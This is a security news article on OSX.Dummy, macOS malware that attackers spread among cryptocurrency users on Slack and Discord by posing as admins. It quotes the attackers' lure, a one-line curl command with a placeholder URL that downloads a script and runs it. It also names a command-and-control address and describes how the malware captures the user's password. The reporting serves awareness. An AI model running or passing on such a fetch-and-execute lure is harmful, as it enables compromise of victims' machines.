Categories: Malware

MACOS Malware Targeting Cryptocurrency Users On Slack and Discord – 100% Undetected Virustotal

Hackers targeting Cryptocurrency users On Slack and Discord chat platforms with MACOS Malware dubbed OSX.Dummy.

The malware targeted users in crypto related chat groups Slack or Discord by impersonating admins or key people. Attackers shared small snippets which result in downloading the malware said Remco Verhoef, who spotted the malware first.

Hackers trick’s users to get infect themselves by running the following script, that results in downloading the malware.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If victims execute the curl command it downloads the large mach064 binary (34M) to /tmp/script which has a perfect score on virustotal 0/64 and the file executed.

MACOS Malware not signed

The MACOS malware was later analyzed by malware researcher Patrick Wardle, according to his analysis report the MACOS Malware was not signed and it contains various libraries such as OpenSSL and V8 appear to be statically compiled in.

The malware bypass Gatekeeper that restricts running unsigned binaries, it was first introduced in Mac OS X Leopard, it enforces codesigning and verifies the application before running.

But if the user downloads and run the binaries through the terminal, GateKeeper does not come into play, so an unsigned binary will be executed.

Wardle said the malware set’s itself to run as root and requires users to enter a password for changing file permission. Then the password will be saved to /tmp/dumpdummy and then malware sets the script to be executable.

If the attack successful then malware establishes the connection to attackers C&C server (185[.]243[.]115[.]230) through port 1337 and the attacker can execute arbitrary commands as root user on the infected machine.

Also Read

New Android RAT Spotted in Wild Abusing Telegram Protocol for Command and Control

Chinese APT’s New Malware MirageFox Launch Cyber Attack on Government & Military Sectors

Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems

Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Recent Posts

Initial Access Brokers Play a Vital Role in Modern Ransomware Attacks

The ransomware threat landscape has evolved dramatically in recent years, with specialized cybercriminals like Initial…

3 minutes ago

Darcula PhaaS: 884,000 Credit Card Details Stolen from 13 Million Global User Clicks

The Darcula group has orchestrated a massive phishing-as-a-service (PhaaS) operation, dubbed Magic Cat, compromising an…

15 minutes ago

Microsoft Resolves Group Policy Issue Blocking Windows 11 24H2 Installation

Microsoft has resolved a critical enterprise-focused bug that blocked organizations from deploying Windows 11 24H2…

21 minutes ago

DragonForce Ransomware Targets Major UK Retailers, Including Harrods, Marks & Spencer, and Co-Op

Major UK retailers including Harrods, Marks and Spencer, and Co-Op are currently experiencing significant service…

47 minutes ago

OpenAI Shifts For-Profit Branch to Public Benefit Corporation, Staying Under Nonprofit Oversight

Landmark organizational shift, OpenAI announced its transition from a capped-profit LLC to a Public Benefit…

1 hour ago

Google’s NotebookLM Introduces Voice Summaries in Over 50 Languages

Google has significantly expanded the capabilities of NotebookLM, its AI-powered research tool, by introducing Audio…

2 hours ago